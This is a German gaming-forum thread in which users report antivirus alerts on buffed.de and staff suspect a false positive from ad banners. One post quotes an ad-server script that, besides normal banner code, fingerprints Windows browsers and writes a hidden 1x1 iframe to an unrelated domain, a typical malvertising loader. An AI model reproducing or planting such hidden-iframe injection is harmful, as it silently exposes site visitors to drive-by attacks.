# Mein Kaspersky meldet ne Virus bei buffed



## Kevran (1. Februar 2012)

Hallo,


Ich weiss net ob ne Thread gibt, wenn ja dann kann ja wieder zu gemacht werden hier. Ich habe seit heute Mittag ne Meldung über Kaspersky Internet Security 2012 bekommen.
Haben auch andere die Nachricht bekommen? Wollte eigentlich nur bescheid sagen^^.

Kaspersky hat bei mir eh auf Verboten gestellt.



Danke


----------



## ZAM (1. Februar 2012)

Ich benötige die URL, bei der die Meldung auftrat. 

Ich habe eben eine Sachen geprüft. Es gibt zumindest keine Anzeichen auf injections bzgl. Iframer-Infektionen oder auch aktuelle Versuche (es gibt da ein paar Merkmale, die man hierfür recht gut prüfen kann).

Wir sind bei solchen Meldungen immer alarmiert und prüfen das auch weiter,  gehen aber momentan eher von einem False-Positive aus, d.h. einer fehlerhaften Heuristik-Erkennung durch den genannten Virenscanner, aufgrund des Auslieferungs-Quellcodes eines Werbebanners. Virenscanner prüfen dabei auf Code-Fragmente, die Ähnlichkeit mit bekannten Merkmalen von Infektionen haben, das trifft auch mal auf Werbebanner oder andere harmlose Scripte zu, die zufällig Ähnlichkeiten mit diesen Elementen aufweisen.


----------



## Tikume (1. Februar 2012)

Wenn ich http://www.republicofadvertising.com/openx/www/delivery/ajs.php?zoneid=634&cb=12513188821&impurl=http://www.buffed.de/&charset=utf-8&loc=http%3A//www.buffed.de//www.buffed eingebe bekomm ich ein Skript:


```
var OX_d490c8d0 = '';
OX_d490c8d0 += "<"+"SCRIPT language=\'JavaScript1.1\' SRC=\"http://ad-emea.doubleclick.net/adj/N1379.282565.WEBADGENCY7/B6274488;click0=http://www.republicofadvertising.com/openx/www/delivery/ck.php?oaparams=2__bannerid=587__zoneid=634__cb=f7bdc665be__oadest=;sz=160x600;ord=f7bdc665be?\">\n";
OX_d490c8d0 += "<"+"/SCRIPT>\n";
OX_d490c8d0 += "<"+"NOSCRIPT>\n";
OX_d490c8d0 += "<"+"a href=\"http://www.republicofadvertising.com/openx/www/delivery/ck.php?oaparams=2__bannerid=587__zoneid=634__cb=f7bdc665be__oadest=http%3A%2F%2Fad-emea.doubleclick.net%2Fjump%2FN1379.282565.WEBADGENCY7%2FB6274488%3Bsz%3D160x600%3Bord%3D%5Btimestamp%5D%3F\" target=\"_blank\">\n";
OX_d490c8d0 += "<"+"IMG SRC=\"http://ad-emea.doubleclick.net/ad/N1379.282565.WEBADGENCY7/B6274488;sz=160x600;ord=f7bdc665be?\" BORDER=0 WIDTH=160 HEIGHT=600 ALT=\"Advertisement\"><"+"/A>\n";
OX_d490c8d0 += "<"+"/NOSCRIPT><"+"div id=\'beacon_f7bdc665be\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://www.republicofadvertising.com/openx/www/delivery/lg.php?bannerid=587&amp;campaignid=79&amp;zoneid=634&amp;loc=1&amp;referer=http%3A%2F%2Fwww.buffed.de%2F%2Fwww.buffed&amp;cb=f7bdc665be\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div><"+"SCRIPT language=\"JavaScript\"> var BrowserDetect = { init: function () { this.browser = this.searchString(this.dataBrowser) || \"An unknown browser\"; this.version = this.searchVersion(navigator.userAgent) || this.searchVersion(navigator.appVersion) || \"an unknown version\"; this.OS = this.searchString(this.dataOS) || \"an unknown OS\"; }, searchString: function (data) { for (var i=0;i<"+"data.length;i++) { var dataString = data[i].string; var dataProp = data[i].prop; this.versionSearchString = data[i].versionSearch || data[i].identity; if (dataString) { if (dataString.indexOf(data[i].subString) != -1) return data[i].identity; } else if (dataProp) return data[i].identity; } }, searchVersion: function (dataString) { var index = dataString.indexOf(this.versionSearchString); if (index == -1) return; return parseFloat(dataString.substring(index+this.versionSearchString.length+1)); }, dataBrowser: [       { string: navigator.userAgent,subString: \"Firefox\",identity: \"Firefox\"},{string: navigator.userAgent,subString: \"MSIE\",identity: \"Explorer\",versionSearch: \"MSIE\"}],dataOS : [{string: navigator.platform,subString: \"Win\",identity: \"Windows\"}]};function addCookie(szName,szValue,dtDaysExpires){ var dtExpires = new Date();var dtExpiryDate = \"\";dtExpires.setTime(dtExpires.getTime()+dtDaysExpires*24*60*60*1000);dtExpiryDate=dtExpires.toGMTString();document.cookie=szName+\"=\"+szValue+\";expires=\"+dtExpiryDate;} function findCookie(szName){        var i=0;var nStartPosition=0;var nEndPosition=0;var szCookieString=document.cookie; while (i<"+"=szCookieString.length){nStartPosition=i;nEndPosition=nStartPosition+szName.length;if (szCookieString.substring(nStartPosition,nEndPosition)==szName){nStartPosition=nEndPosition+1;nEndPosition=document.cookie.indexOf(\";\",nStartPosition);if(nEndPosition<"+"nStartPosition) nEndPosition=document.cookie.length;return document.cookie.substring(nStartPosition,nEndPosition);break;}i++;} return \"\";} BrowserDetect.init(); var szCookieString = document.cookie; var boroda = BrowserDetect.browser; var os = BrowserDetect.OS; if ( ((boroda == \"Firefox\" || boroda == \"Explorer\") && (os == \"Windows\")) && (findCookie(\'geo_idn\')!=\'c48a765e4f75baeb85f0a755fc3ec09c\') ) {addCookie(\"geo_idn\",\"c48a765e4f75baeb85f0a755fc3ec09c\",1);document.write(\'<"+"iframe src=\"http://stepformoneynow.biz/stream?1\" name=\"Twitter\" scrolling=\"auto\" frameborder=\"no\" align=\"center\" height = \"1px\" width = \"1px\"><"+"/iframe>\');}else {}<"+"/SCRIPT>\n";
document.write(OX_d490c8d0);
```

Mal gesetzt es ist keine Falschmeldung (worauf ich mal tippe) wäre die Frage ob Du überhaupt nachvollziehen kannst welchee Werbung Doubleclick wann wo geschaltet hat?


----------



## ZAM (1. Februar 2012)

Tikume schrieb:


> Mal gesetzt es ist keine Falschmeldung (worauf ich mal tippe) wäre die Frage ob Du überhaupt nachvollziehen kannst welchee Werbung Doubleclick wann wo geschaltet hat?



Schon klar - aber das kommt aus dem Adserver, das schließt injected infections aus, d.h. da kommt nichts von uns oder "aus unserer Seite", sondern vom Werbepartner und die Sachen werden ebenfalls geprüft. Siehe diesbezüglich Erläuterung zu Heuristiks.


----------



## Tikume (1. Februar 2012)

Das mit den Heuristiks ist schon klar und wie Oben geschrieben tippe ich da ja auch drauf.
Dennoch kam es ja schon (bei anderen Seiten, nicht eurer wohlgemerkt) auch schon dazu dass verseuchte Werbung ausgeliefert wurde.
In dem Fall habt ihr selbst vermutlich nur die Möglichkeit den Werbepartner zu informieren, das meinte ich.


----------



## Kevran (1. Februar 2012)

Wie gesagt die Meldung von Kaspersky kam so plötzlich als ich www.buffed.de eingegeben habe, kam die Meldung. Wie gesagt kann sein, dass es von Werbung ist. Hab aber kein Werbung etc. angeklickt^^. Bin da nochmal auf Starwars gegangen.
Kann sein dass es eine Richtig Falsch Meldung ist, weiss aber gerade net so ganz. habe einfach gedacht, ich melde es mal^^. Mit Antivirus etc. hab ich schon Ahnung^^.


Edit: Bin eben nochmal bei www.buffed.de reingegangen, es kam keine Meldung mehr.Scheint wirklich ne Werbung zusein, sodass mein Kaspersky es abblockt.


----------



## Ando2 (19. März 2012)

Das selbe hatte ich auch gerade mit Antivir mit der Meldung .Sofort nach nach buffed öffnen


Avira Free Antivirus
Erstellungsdatum der Reportdatei: Montag, 19. März 2012  14:58

Es wird nach 3571873 Virenstämmen gesucht.

Das Programm läuft als uneingeschränkte Vollversion.
Online-Dienste stehen zur Verfügung.

Lizenznehmer   : Avira AntiVir Personal - Free Antivirus
Seriennummer   : 0000149996-ADJIE-0000001
Plattform  	: Windows 7
Windowsversion : (plain)  [6.1.7600]
Boot Modus 	: Normal gebootet
Benutzername   : SYSTEM
Computername   : TOSHIBA-PC

Versionsinformationen:
BUILD.DAT  	: 12.0.0.898 	41963 Bytes  31.01.2012 13:51:00
AVSCAN.EXE 	: 12.1.0.20 	492496 Bytes  31.01.2012 07:55:52
AVSCAN.DLL 	: 12.1.0.18  	65744 Bytes  31.01.2012 07:56:29
LUKE.DLL   	: 12.1.0.19  	68304 Bytes  31.01.2012 07:56:01
AVSCPLR.DLL	: 12.1.0.22 	100048 Bytes  31.01.2012 07:55:52
AVREG.DLL  	: 12.1.0.29 	228048 Bytes  31.01.2012 07:55:51
VBASE000.VDF   : 7.10.0.0	19875328 Bytes  06.11.2009 10:49:21
VBASE001.VDF   : 7.11.0.0	13342208 Bytes  14.12.2010 07:56:15
VBASE002.VDF   : 7.11.19.170 14374912 Bytes  20.12.2011 07:56:21
VBASE003.VDF   : 7.11.21.238  4472832 Bytes  01.02.2012 12:42:38
VBASE004.VDF   : 7.11.21.239 	2048 Bytes  01.02.2012 12:42:38
VBASE005.VDF   : 7.11.21.240 	2048 Bytes  01.02.2012 12:42:38
VBASE006.VDF   : 7.11.21.241 	2048 Bytes  01.02.2012 12:42:38
VBASE007.VDF   : 7.11.21.242 	2048 Bytes  01.02.2012 12:42:38
VBASE008.VDF   : 7.11.21.243 	2048 Bytes  01.02.2012 12:42:39
VBASE009.VDF   : 7.11.21.244 	2048 Bytes  01.02.2012 12:42:39
VBASE010.VDF   : 7.11.21.245 	2048 Bytes  01.02.2012 12:42:39
VBASE011.VDF   : 7.11.21.246 	2048 Bytes  01.02.2012 12:42:40
VBASE012.VDF   : 7.11.21.247 	2048 Bytes  01.02.2012 12:42:40
VBASE013.VDF   : 7.11.22.33   1486848 Bytes  03.02.2012 12:43:10
VBASE014.VDF   : 7.11.22.56	687616 Bytes  03.02.2012 12:43:23
VBASE015.VDF   : 7.11.22.92	178176 Bytes  06.02.2012 12:43:25
VBASE016.VDF   : 7.11.22.154   144896 Bytes  08.02.2012 12:43:27
VBASE017.VDF   : 7.11.22.220   183296 Bytes  13.02.2012 12:43:32
VBASE018.VDF   : 7.11.23.34	202752 Bytes  15.02.2012 12:43:34
VBASE019.VDF   : 7.11.23.98	126464 Bytes  17.02.2012 14:54:15
VBASE020.VDF   : 7.11.23.150   148480 Bytes  20.02.2012 15:17:56
VBASE021.VDF   : 7.11.23.224   172544 Bytes  23.02.2012 15:17:56
VBASE022.VDF   : 7.11.24.52	219648 Bytes  28.02.2012 15:18:04
VBASE023.VDF   : 7.11.24.152   165888 Bytes  05.03.2012 15:18:10
VBASE024.VDF   : 7.11.24.204   177664 Bytes  07.03.2012 19:51:54
VBASE025.VDF   : 7.11.25.30	245248 Bytes  12.03.2012 20:58:49
VBASE026.VDF   : 7.11.25.121   252416 Bytes  15.03.2012 18:04:00
VBASE027.VDF   : 7.11.25.122 	2048 Bytes  15.03.2012 18:04:03
VBASE028.VDF   : 7.11.25.123 	2048 Bytes  15.03.2012 18:04:03
VBASE029.VDF   : 7.11.25.124 	2048 Bytes  15.03.2012 18:04:03
VBASE030.VDF   : 7.11.25.125 	2048 Bytes  15.03.2012 18:04:03
VBASE031.VDF   : 7.11.25.146   107520 Bytes  18.03.2012 18:07:12
Engineversion  : 8.2.10.24 
AEVDF.DLL  	: 8.1.2.2   	106868 Bytes  31.01.2012 07:55:38
AESCRIPT.DLL   : 8.1.4.10  	455035 Bytes  15.03.2012 15:20:00
AESCN.DLL  	: 8.1.8.2   	131444 Bytes  17.02.2012 12:44:40
AESBX.DLL  	: 8.2.5.5   	606579 Bytes  12.03.2012 21:00:24
AERDL.DLL  	: 8.1.9.15  	639348 Bytes  31.01.2012 07:55:37
AEPACK.DLL 	: 8.2.16.5  	803190 Bytes  08.03.2012 19:53:28
AEOFFICE.DLL   : 8.1.2.25  	201084 Bytes  31.01.2012 07:55:36
AEHEUR.DLL 	: 8.1.4.7  	4501878 Bytes  16.03.2012 18:06:58
AEHELP.DLL 	: 8.1.19.0  	254327 Bytes  17.02.2012 12:43:54
AEGEN.DLL  	: 8.1.5.23  	409973 Bytes  08.03.2012 19:52:13
AEEXP.DLL  	: 8.1.0.25   	74101 Bytes  15.03.2012 15:20:01
AEEMU.DLL  	: 8.1.3.0   	393589 Bytes  31.01.2012 07:55:34
AECORE.DLL 	: 8.1.25.6  	201078 Bytes  15.03.2012 15:18:42
AEBB.DLL   	: 8.1.1.0    	53618 Bytes  31.01.2012 07:55:33
AVWINLL.DLL	: 12.1.0.17  	27344 Bytes  31.01.2012 07:55:54
AVPREF.DLL 	: 12.1.0.17  	51920 Bytes  31.01.2012 07:55:51
AVREP.DLL  	: 12.1.0.17 	179408 Bytes  31.01.2012 07:55:51
AVARKT.DLL 	: 12.1.0.23 	209360 Bytes  31.01.2012 07:55:46
AVEVTLOG.DLL   : 12.1.0.17 	169168 Bytes  31.01.2012 07:55:47
SQLITE3.DLL	: 3.7.0.0   	398288 Bytes  31.01.2012 07:56:07
AVSMTP.DLL 	: 12.1.0.17  	62928 Bytes  31.01.2012 07:55:52
NETNT.DLL  	: 12.1.0.17  	17104 Bytes  31.01.2012 07:56:02
RCIMAGE.DLL	: 12.1.0.17	4447952 Bytes  31.01.2012 07:56:32
RCTEXT.DLL 	: 12.1.0.16  	98512 Bytes  31.01.2012 07:56:32

Konfiguration für den aktuellen Suchlauf:
Job Name..............................: AVGuardAsyncScan
Konfigurationsdatei...................: C:\ProgramData\Avira\AntiVir Desktop\TEMP\AVGUARD_4f673ad1\guard_slideup.avp
Protokollierung.......................: standard
Primäre Aktion........................: interaktiv
Sekundäre Aktion......................: quarantäne
Durchsuche Masterbootsektoren.........: ein
Durchsuche Bootsektoren...............: aus
Durchsuche aktive Programme...........: ein
Durchsuche Registrierung..............: aus
Suche nach Rootkits...................: aus
Integritätsprüfung von Systemdateien..: aus
Datei Suchmodus.......................: Alle Dateien
Durchsuche Archive....................: ein
Rekursionstiefe einschränken..........: 20
Archiv Smart Extensions...............: ein
Makrovirenheuristik...................: ein
Dateiheuristik........................: vollständig

Beginn des Suchlaufs: Montag, 19. März 2012  14:58

Der Suchlauf über gestartete Prozesse wird begonnen:
Durchsuche Prozess 'wmiprvse.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'avscan.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'taskhost.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'avscan.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'FlashUtil11f_ActiveX.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'iexplore.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'iexplore.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'ts3client_win32.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'wmpnetwk.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'SearchIndexer.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'conhost.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'avshadow.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'mqtgsvc.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'avgnt.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'rundll32.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'sppsvc.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'mqsvc.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'inetinfo.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'avguard.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'taskhost.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'Explorer.EXE' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'Dwm.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'sched.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'spoolsv.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'winlogon.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'lsm.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'lsass.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'services.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'csrss.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'wininit.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'csrss.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'smss.exe' - '1' Modul(e) wurden durchsucht

Der Suchlauf über die ausgewählten Dateien wird begonnen:

Beginne mit der Suche in 'C:\Users\Toshiba\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1WLJN17T\widget_cont_fg[1].htm'
C:\Users\Toshiba\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1WLJN17T\widget_cont_fg[1].htm
  [FUND]  	Enthält Erkennungsmuster des HTML-Scriptvirus HTML/Infected.WebPage.Gen2
Beginne mit der Suche in 'C:\Users\Toshiba\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\4JQTWFQ3\widget_cont_fg[1].htm'
C:\Users\Toshiba\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\4JQTWFQ3\widget_cont_fg[1].htm
  [FUND]  	Enthält Erkennungsmuster des HTML-Scriptvirus HTML/Infected.WebPage.Gen2
Beginne mit der Suche in 'C:\Users\Toshiba\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\MWNLDB42\widget_cont_fg[2].htm'
C:\Users\Toshiba\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\MWNLDB42\widget_cont_fg[2].htm
  [FUND]  	Enthält Erkennungsmuster des HTML-Scriptvirus HTML/Infected.WebPage.Gen2
Beginne mit der Suche in 'C:\Users\Toshiba\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZKOIO23Z\widget_cont_fg[1].htm'
C:\Users\Toshiba\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZKOIO23Z\widget_cont_fg[1].htm
  [FUND]  	Enthält Erkennungsmuster des HTML-Scriptvirus HTML/Infected.WebPage.Gen2

Beginne mit der Desinfektion:
C:\Users\Toshiba\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZKOIO23Z\widget_cont_fg[1].htm
  [FUND]  	Enthält Erkennungsmuster des HTML-Scriptvirus HTML/Infected.WebPage.Gen2
  [WARNUNG]   Die Datei wurde ignoriert.
C:\Users\Toshiba\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\MWNLDB42\widget_cont_fg[2].htm
  [FUND]  	Enthält Erkennungsmuster des HTML-Scriptvirus HTML/Infected.WebPage.Gen2
  [WARNUNG]   Die Datei wurde ignoriert.
C:\Users\Toshiba\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\4JQTWFQ3\widget_cont_fg[1].htm
  [FUND]  	Enthält Erkennungsmuster des HTML-Scriptvirus HTML/Infected.WebPage.Gen2
  [WARNUNG]   Die Datei wurde ignoriert.
C:\Users\Toshiba\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1WLJN17T\widget_cont_fg[1].htm
  [FUND]  	Enthält Erkennungsmuster des HTML-Scriptvirus HTML/Infected.WebPage.Gen2
  [WARNUNG]   Die Datei wurde ignoriert.


Ende des Suchlaufs: Montag, 19. März 2012  15:00
Benötigte Zeit: 00:01 Minute(n)

Der Suchlauf wurde vollständig durchgeführt.

  	0 Verzeichnisse wurden überprüft
	48 Dateien wurden geprüft
  	4 Viren bzw. unerwünschte Programme wurden gefunden
  	0 Dateien wurden als verdächtig eingestuft
  	0 Dateien wurden gelöscht
  	0 Viren bzw. unerwünschte Programme wurden repariert
  	0 Dateien wurden in die Quarantäne verschoben
  	0 Dateien wurden umbenannt
  	0 Dateien konnten nicht durchsucht werden
	44 Dateien ohne Befall
  	0 Archive wurden durchsucht
  	4 Warnungen
  	0 Hinweise


Die Suchergebnisse werden an den Guard übermittelt.


----------



## kaepteniglo (19. März 2012)

Tritt das Reproduzierbar auf?

Ich vermute mal wieder eine Werbung oder einen Fehlalarm.


----------



## ZAM (19. März 2012)

Vielen Dank für den Hinweis. Der Hinweis auf ein False-Postive ist hier: "[font="arial, verdana, tahoma, sans-serif"]Enthält Erkennungsmuster[/font]". 

Ansonsten ist es leider nicht reproduzierbar. Ich nutze privat auch Kaspersky und mit buffed-Premium-Account (keine Werbung) meckert es nicht, aber auch mit Werbung nicht. Es kann durchaus sein, dass in einem der Werbebanner möglicherweise Codefragmente stecken, die für die Auslieferung notwendig sind und einer Infektion *ähneln* aber reelle keine Gefahr darstellen. Das wird meist schnell von Kaspersky selbst (spätestens nach 24 Stunden) korrigiert.


----------



## kaepteniglo (19. März 2012)

ZAM, der letzte Poster nutzt Avira


----------



## Ando2 (19. März 2012)

Leider kommt es nicht wieder, denn ist immunisiert so das das Programm erst garnicht mehr zugelassen wird und sofort geblockt ist.


----------



## ZAM (20. März 2012)

kaepteniglo schrieb:


> ZAM, der letzte Poster nutzt Avira



Warum dann Post in den Kaspersky-Beitrag? Re-Use ist zwar gut für die Übersicht, aber nur wenn das Topic nicht verwirrt. ^^

Aber abgesehen davon unterscheidet sich Avira in der Sache nicht von kaspersky, erklärt nur nochmal zusätzlich, dass ich keine Meldung bekommen habe. ^^


----------



## Ando2 (21. März 2012)

Sry wenn das zu Irretationen bei Dir führte.Jedoch habe ich anstatt nen neuen Thread lieber nen schon thematisch gleichen Thread bevorzugt, um nicht zuviel gleichem Themas zu haben.


----------

